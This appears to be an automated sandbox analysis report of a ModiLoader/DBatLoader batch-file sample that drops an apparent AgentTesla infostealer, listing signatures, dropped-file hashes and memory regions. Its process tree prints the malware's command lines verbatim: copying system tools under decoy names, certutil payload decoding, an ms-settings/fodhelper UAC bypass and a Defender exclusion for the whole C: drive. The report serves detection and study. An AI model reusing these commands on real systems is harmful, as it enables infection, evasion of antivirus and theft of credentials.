Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
07-06-2024 01:10
General
-
Target
1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat
-
Size
3.0MB
-
MD5
17c7045b36fae5916e2900899e40fcdc
-
SHA1
793de1034b8dbce1547b85d7348324e8fb5d0106
-
SHA256
1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df
-
SHA512
f4be2aa7efaad65542147360369292774d242c0cc8ab6489036f601b9e914642a3183d0a2b0130d216e2b40baaebf368395cf755a5680999c2e83cfcdf899e46
-
SSDEEP
49152:MmZIVekHAYmaBfa2cLySXFDvh13zo//zhK6x3UGZJyFxCknVgGlL1+I0bHdFE4K3:x
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Detect packed .NET executables. Mostly AgentTeslaV4. 33 IoCs
-
ModiLoader Second Stage 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 28 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies registry class 5 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
-
C:\Windows \System32\per.exe"C:\\Windows \\System32\\per.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\qtswufjG.cmd""3⤵
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"4⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "4⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\Gjfuwstq.bat""3⤵
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Gjfuwstq.PIF3⤵
-
C:\Users\Public\Libraries\qtswufjG.pifC:\Users\Public\Libraries\qtswufjG.pif3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n10tihqe.0tx.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Public\Libraries\Gjfuwstq.batFilesize
23KB
MD5997f3d1af6cf88547c7fe0cdf516ac0c
SHA1d9bb666d58d8f33d82d6787f89bb4f21057c8965
SHA25672c98a4c731ca55cceac4da6af62b6d9923282b5d8d07c6b920594bb85be2499
SHA512e64d178552b5baf83449ae1631c62becd66729af8faedf612128ed3a2020b0e72ca1b424823f8e105ff79c364b488b06cca55023efac2965a1d0832dccfc16b9
-
C:\Users\Public\Libraries\Ping_c.pifFilesize
1.1MB
MD5962c746f045885ca2883fec129a5bb98
SHA1bdad34f489b6a8b3a3101d658ea426805e859473
SHA2568b5cbf4eba7ce848616eda92a3eaea0372a7a97efba05ce2ebfac5c99c243e71
SHA51245cd944310a28216835eea924cd03c668b948ccab63a7b6489453a69bf6a7f160d105e9879096580d571e7af1ab4deea02ec506f57f48e370b8c5918c44cdb83
-
C:\Users\Public\Libraries\qtswufjG.cmdFilesize
13KB
MD5ecac4200f2c6ab06102f8fe7b14a96af
SHA182e148655bfe410f80cafb070713259e94ec00cb
SHA256067cd486f7b1a9b7ca52a6d2ab25fdd443f839485e4787a768f9c6654e003271
SHA512d6c271a9bd0a2ab68ae3270bfca920049a86e8ad4aa66ce9c376a88f02de041a8bf7b24b757aac2f67042c38ff01f4b6f615cd1d1b76fe25974d7ffeb03ba348
-
C:\Users\Public\Libraries\qtswufjG.pifFilesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
C:\Users\Public\Ping_c.mp4Filesize
2.2MB
MD518fbc4b3cab1f954789cf7649dcd1dff
SHA1661ba52bd44e913cd74b214e1652843f1f894e1c
SHA2564bb6bb0afbf65b0bdf0d5f0963c1133f3a0d049557d485d185e1e65b5b84987a
SHA512de11b7621e1170f0f6d0efa75d2b75456a5b3d677d865ab07ad157b1e7ad7eec175404500e92806e7c20085512b82ad2db2c0eb83377baacd24d0500b5e501c3
-
C:\Users\Public\alpha.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Users\Public\alpha.exeFilesize
231KB
MD5d0fce3afa6aa1d58ce9fa336cc2b675b
SHA14048488de6ba4bfef9edf103755519f1f762668f
SHA2564d89fc34d5f0f9babd022271c585a9477bf41e834e46b991deaa0530fdb25e22
SHA51280e127ef81752cd50f9ea2d662dc4d3bf8db8d29680e75fa5fc406ca22cafa5c4d89ef2eac65b486413d3cdd57a2c12a1cb75f65d1e312a717d262265736d1c2
-
C:\Users\Public\ger.exeFilesize
75KB
MD5227f63e1d9008b36bdbcc4b397780be4
SHA1c0db341defa8ef40c03ed769a9001d600e0f4dae
SHA256c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d
SHA512101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9
-
C:\Users\Public\kn.exeFilesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
C:\Users\Public\xkn.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Windows \System32\per.exeFilesize
48KB
MD585018be1fd913656bc9ff541f017eacd
SHA126d7407931b713e0f0fa8b872feecdb3cf49065a
SHA256c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5
SHA5123e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459
-
memory/4160-75-0x0000000000400000-0x0000000000522000-memory.dmpFilesize
1.1MB
-
memory/4352-149-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-130-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-100-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/4352-102-0x0000000040390000-0x00000000403EC000-memory.dmpFilesize
368KB
-
memory/4352-104-0x00000000409E0000-0x0000000040A3A000-memory.dmpFilesize
360KB
-
memory/4352-103-0x00000000403F0000-0x0000000040994000-memory.dmpFilesize
5.6MB
-
memory/4352-154-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-164-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-163-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-158-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-156-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-152-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-150-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-1161-0x0000000042020000-0x000000004202A000-memory.dmpFilesize
40KB
-
memory/4352-146-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-142-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-140-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-138-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-136-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-134-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-132-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-97-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/4352-128-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-126-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-124-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-1157-0x0000000040B40000-0x0000000040BA6000-memory.dmpFilesize
408KB
-
memory/4352-160-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-122-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-120-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-118-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-144-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-116-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-114-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-112-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-110-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-108-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-106-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-105-0x00000000409E0000-0x0000000040A34000-memory.dmpFilesize
336KB
-
memory/4352-1159-0x0000000041CD0000-0x0000000041D6C000-memory.dmpFilesize
624KB
-
memory/4352-1158-0x0000000041C80000-0x0000000041CD0000-memory.dmpFilesize
320KB
-
memory/4352-1160-0x0000000041E00000-0x0000000041E92000-memory.dmpFilesize
584KB
-
memory/4368-36-0x0000020B34BB0000-0x0000020B34BD2000-memory.dmpFilesize
136KB